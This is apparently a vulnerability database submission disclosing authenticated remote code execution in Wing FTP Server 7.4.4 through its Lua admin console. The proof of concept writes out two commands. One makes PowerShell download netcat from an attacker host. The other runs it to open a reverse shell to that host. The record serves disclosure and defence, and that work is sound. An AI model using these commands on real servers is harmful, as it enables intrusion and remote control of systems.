| Título | wftpserver Wing FTP Server 7.4.4 Remote Code Execution via Lua Admin Console |
|---|
| Descripción | Affected Version: Wing FTP Server 7.4.4 (Windows)
Authentication Required: Yes
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.
---
POC:
To execute the exploit, I logged into the application with a admin account via remote web access. The Wing FTP Server was in my Windows and I accessed the console via browser in my Linux (the software has remote access feature).
In the Lua admin console, type the following command:
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')
---
The first peace of the command will download the nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part will execute nc.exe 192.168.234.131 4443 -e cme.exe. Now you get a reverse shell!
Is possible to see in this link (https://www.wftpserver.com/serverhistory.htm) the vendor mention that RCE in version 7.4.4 was fixed. |
|---|
| Fuente | ⚠️ https://github.com/Nouvexr/Wing-FTP-Server-7.4.4-RCE-Authenticated/blob/main/poc.txt |
|---|
| Usuario | nouvexr (UID 33215) |
|---|
| Sumisión | 2025-05-24 16:44 (hace 1 Año) |
|---|
| Moderación | 2025-05-26 10:20 (2 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 310279 [Wing FTP Server hasta 7.4.3 Lua Admin Console escalada de privilegios] |
|---|
| Puntos | 20 |
|---|